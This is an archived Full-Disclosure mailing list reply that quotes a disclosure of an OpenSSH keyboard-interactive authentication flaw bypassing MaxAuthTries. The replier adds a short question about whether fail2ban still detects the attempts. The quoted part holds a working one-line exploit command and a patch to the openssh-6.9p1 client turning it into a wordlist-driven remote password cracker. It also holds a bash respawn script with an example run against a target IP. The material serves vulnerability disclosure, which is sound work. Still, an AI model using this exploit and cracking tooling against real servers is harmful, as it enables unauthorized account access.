| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 18 Jul 2015 03:29:20 +0100
From: devel@...soft.ltd.uk
To: fulldisclosure@...lists.org
Subject: Re: [FD] OpenSSH keyboard-interactive authentication brute force
vulnerability (MaxAuthTries bypass)
On 17/07/15 10:04, king cope wrote:
> OpenSSH has a default value of six authentication tries before it will
> close the connection (the ssh client allows only three password
> entries per default).
>
> With this vulnerability an attacker is able to request as many
> password prompts limited by the “login graced time” setting, that is
> set to two minutes by default.
>
> Especially FreeBSD systems are affected by the vulnerability because
> they have keyboard-interactive authentication enabled by default.
>
> A simple way to exploit the bug is to execute this command:
>
> ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x
> 10000'` targethost
>
> This will effectively allow up to 10000 password entries limited by
> the login grace time setting.
>
> The crucial part is that if the attacker requests 10000
> keyboard-interactive devices openssh will gracefully execute the
> request and will be inside a loop to accept passwords until the
> specified devices are exceeded.
>
> Here is a patch for openssh-6.9p1 that will allow to use a wordlist
> and any passwords piped to the ssh process to be used in order to
> crack passwords remotely.
>
> ---snip---
>
> diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c
> 83a84,85
> > char password[1024];
> >
> 510c512,517
> < authctxt->success = 1; /* break out */
> ---
> > printf("==============================================\n");
> > printf("*** SUCCESS **********************************\n");
> > printf("*** PASSWORD: %s\n", password);
> > printf("==============================================\n");
> > exit(0);
> >
> 1376a1384,1385
> > char *devicebuffer;
> > int i;
> 1386a1396,1405
> > devicebuffer = calloc(1, 200000);
> > if (!devicebuffer) {
> > fatal("cannot allocate devicebuffer");
> > }
> >
> > for (i=0;i<200000-2;i+=2) {
> > memcpy(devicebuffer + i, "p,", 2);
> > }
> > devicebuffer[200000] = 0;
> >
> 1393,1394c1412
> < packet_put_cstring(options.kbd_interactive_devices ?
> < options.kbd_interactive_devices : "");
> ---
> > packet_put_cstring(devicebuffer);
> 1408c1426
> < char *name, *inst, *lang, *prompt, *response;
> ---
> > char *name, *inst, *lang, *prompt;
> 1410c1428
> < int echo = 0;
> ---
> > char *pos;
> 1425a1444
> >
> 1430a1450
> >
> 1443,1449c1463,1469
> < echo = packet_get_char();
> <
> < response = read_passphrase(prompt, echo ? RP_ECHO : 0);
> <
> < packet_put_cstring(response);
> < explicit_bzero(response, strlen(response));
> < free(response);
> ---
> > packet_get_char();
> > if (fgets(password, 1024, stdin) == NULL)
> > exit(0);
> > if ((pos=strchr(password, '\n')) != NULL)
> > *pos = '';
> > printf("%s\n", password);
> > packet_put_cstring(password);
>
> ---snip---
>
> After applying the patch you can use this shell script to make the
> password attack from a wordlist:
>
> ---snip---
>
> #!/bin/bash
> # run as:
> # cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target
> #
> while true
> do
> ./ssh -l$1 $2
> rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi
> echo Respawn due to login grace time...
> done
>
> ---snip---
>
> For example enter this command:
>
> cat wordlist.txt | ./sshcracker.sh test 192.168.2.173
>
> The attack has been tested against a new FreeBSD 10.1 system and older
> FreeBSD versions such as version 6.2.
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
Do you know if this is still affected if you have fail2ban in place.
Fail2ban uses the auth logs to monitor failed password attempts. I
assume that the auth log is still updated even if x number of attempts
is allowed. Thanks
--
==
Don Alexander
It's a tough job, but some mug has to do it...
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists